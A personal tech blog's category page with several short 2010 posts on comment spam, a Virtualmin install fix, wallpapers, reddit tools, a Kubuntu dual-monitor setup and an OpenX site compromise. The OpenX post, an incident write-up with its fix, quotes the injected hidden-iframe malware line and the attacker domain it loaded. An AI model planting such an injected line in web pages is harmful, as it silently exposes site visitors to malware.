Category: Geek
A gang of Turkish spammers have found my site
I woke up this morning and found 50 or so messages in my inbox saying that someone had left a comment on my website. Turns out that lukemcreynolds.com had been “profiled” in the r10.net forums as being an easy target for comment spam.
I found out the source of all the spam by looking at my referrer logs: all the new hits on my site were coming from http://r10.net/dmoz-ve-diger-dizinler/663993-kisa-sureli-dofollow-paylasimlari.html. In case the link gets taken down, here‘s a link to the content of the frontpage (PDF).
Anyway, I deleted all the spam comments and disabled commenting on the site for a little while. Commenting is back up now, but I’ll be keeping a close eye on things. It pisses me off that people are making money off of causing me work.
The person who posted the initial links to my site, inviting other to spam it, was “Serdal_Altundal”.
Posted on Jun 23, 2010 - 06:34 PM
Virtualmin GPL installation on Amazon EC2 with the ami-3c56b255 instance
This is more of a note for myself than for anything else, but maybe someone else will find it useful:
If you’re installing Virtualmin GPL on the ami-3c56b255 Centos5 instance, you’ll find that running the regular install.sh script doesn’t work. It’ll give an error something like this:
FATAL - Fatal Error Occurred: Something went wrong during installation: 0
FATAL - Cannot continue installation.
FATAL - Attempting to remove virtualmin repository configuration, so the installation can be
FATAL - re-attempted after any problems have been resolved.
FATAL - Removing temporary directory and files.
FATAL - If you are unsure of what went wrong, you may wish to review the log
FATAL - in /root/virtualmin-install.log
Anyway, all you need to do to fix it is to install the openssl-devel package: yum install openssl-devel
The Virtualmin GPL install will work just fine after that.
Posted on May 13, 2010 - 03:41 AM
Desktop Wallpaper - 100+ images!
I’ve been collecting cool-looking desktop backgrounds for a long time, and I’ve just decided to put them online to share with everyone. You can check them out at http://lukemcreynolds.com/wallpaper/.
Let me know what you think, or if you know the source for one of the images I wasn’t able to find a source for.
Posted on Apr 20, 2010 - 12:47 AM
OpenX vulnerability leads to site hack and malware speading
A client of mine recently had his site start distributing malware due to an OpenX vulnerability. He was using 2.8.0.
Here’s how I found the problem and how I fixed it.
We first knew something was up when Firefox started displaying this warning when trying to access the site:
Using Google’s Webmaster tools to find out which pages were infected, I traced the problem to OpenX (instead of ExpressionEngine or other software) using the Web Developer plugin for Firefox. Here’s what worked for me:
- Install and enable the plugin and enable the toolbar
- Click on Information > View JavaScript (See photo below)
- Search on the page for “iframe”
And that’s how I found it, even though I couldn’t find the iframe in the source of any of the pages I looked at. In OpenX, the /www/delivery/ajs.php file dynamically creates javascipt that is loaded every time someone views an ad on your site. The malware-ridden javascript that was loading was at http://www.example.com/openx/www/delivery/ajs.php?zoneid=3&cb=20705736901&loc=http%3A//example.com/ where example.com is the domain name. The content that was added looked like this:
document.write('<iframe src="http://banan.uk.to/stats?counter=198" width=0 height=0></iframe>');
and was at the very top of the file.
banan.uk.to is the bad domain.
Upgrading OpenX to the most recent version, 2.8.5, eliminated the vulnerability and removed the iframe from the site’s javascript.
I hope this helps someone. Let me know in the comments if you have questions.
Posted on Mar 26, 2010 - 01:03 PM
reddit.com moderation tools
I’m a moderator on a couple of the subcommunities on reddit.com. I like reddit and being a mod a lot, but that doesn’t mean I don’t need to put up with my fair share of trolls.
Here are a couple tools I’ve found that make it a little bit easier to see what types of comments a user tends to make. These should help moderators and other interested individuals in figuring out who’s constructively contributing to reddit.
Reddit Score Card
Gives average comment karma per word of a user’s last 25 comments
AreYouATroll
Test to see if you’re a troll or not. (Alright, that part’s not accurate, but the percentage up/downvotes are useful.)
Reddit Comment Finder
This is a simple reddit comment finder script. It’s useful, but it doesn’t have many features, although it’s written in just 5KB of python, so it’s easily extensible.
Know of any other good reddit tools? Post them in the comments - I’ll add them to this list once I test them out.
Posted on Mar 19, 2010 - 12:28 PM
Dual Monitor Setup on Kubuntu 9.10 with KDE 4.3.2
Edit May 5 2010 - this works on Kubuntu 10.04 Lucid Lynx with KDE 4.4.2 as well.
I bought another monitor today, and found that it was actually quite easy to set up with KDE and Kubuntu (Karmic Koala). I have an ATI Radeon HD 4830, and I use the proprietary drivers.
Anyways, here’s what worked: instead of doing it KDE or Ubuntu-style, I set the monitors up with ATI’s AMD Catalyst Control Center. If you have the fglrx drivers installed, then you probably already have it: run it with
sudo amdcccle
from the command line.
You’ll get something like this:
Anyway, make sure your screens aren’t clones of each other in the Display Manager part. That’ll let you enable xinerama under Display Options. Apply the settings, restart your computer, and you should have two fully-functioning, non-cloned monitors!
My xorg.conf is below, just for reference:
Section “ServerLayout”
Identifier “amdcccle Layout”
Screen 0 “amdcccle-Screen[1]-0” 0 0
Screen “amdcccle-Screen[1]-1” 1920 0
EndSectionSection “Files”
EndSectionSection “Module”
Load “glx”
EndSectionSection “ServerFlags”
Option “Xinerama” “on”
EndSectionSection “Monitor”
Identifier “0-DFP1”
Option “VendorName” “ATI Proprietary Driver”
Option “ModelName” “Generic Autodetecting Monitor”
Option “DPMS” “true”
Option “PreferredMode” “1920x1200”
Option “TargetRefresh” “60”
Option “Position” “0 0”
Option “Rotate” “normal”
Option “Disable” “false”
EndSectionSection “Monitor”
Identifier “0-DFP2”
Option “VendorName” “ATI Proprietary Driver”
Option “ModelName” “Generic Autodetecting Monitor”
Option “DPMS” “true”
Option “PreferredMode” “1920x1200”
Option “TargetRefresh” “60”
Option “Position” “0 0”
Option “Rotate” “normal”
Option “Disable” “false”
EndSectionSection “Device”
Identifier “Default Device”
Driver “fglrx”
EndSectionSection “Device”
Identifier “amdcccle-Device[1]-0”
Driver “fglrx”
Option “Monitor-DFP1” “0-DFP1”
BusID “PCI:1:0:0”
EndSectionSection “Device”
Identifier “amdcccle-Device[1]-1”
Driver “fglrx”
Option “Monitor-DFP2” “0-DFP2”
BusID “PCI:1:0:0”
Screen 1
EndSectionSection “Screen”
Identifier “Default Screen”
DefaultDepth 24
SubSection “Display”
Virtual 3840 1200
EndSubSection
EndSectionSection “Screen”
Identifier “amdcccle-Screen[1]-0”
Device “amdcccle-Device[1]-0”
DefaultDepth 24
SubSection “Display”
Viewport 0 0
Depth 24
EndSubSection
EndSectionSection “Screen”
Identifier “amdcccle-Screen[1]-1”
Device “amdcccle-Device[1]-1”
DefaultDepth 24
SubSection “Display”
Viewport 0 0
Depth 24
EndSubSection
EndSection
Above is the Catalyst Control Center-generated xorg.conf that worked for me when Krandrtray, Gnome’s display panel and KDE’s display settings didn’t do anything. Let me know in the comments if you have any questions.
Also, here’s what my desktop looks like now:
(Click the thumbnail for a full-size version)
Posted on Jan 25, 2010 - 03:06 AM
Fun little toy I made: a Reddit dubstep application
Check it out: http://dubstepp.com/. Basically, it scrapes reddit.com/r/dubstep for YouTube links (tracks) and aggregates them all in one place.
I particularly like the search function. It’s actually quite useful.
Posted on Dec 07, 2009 - 05:41 PM
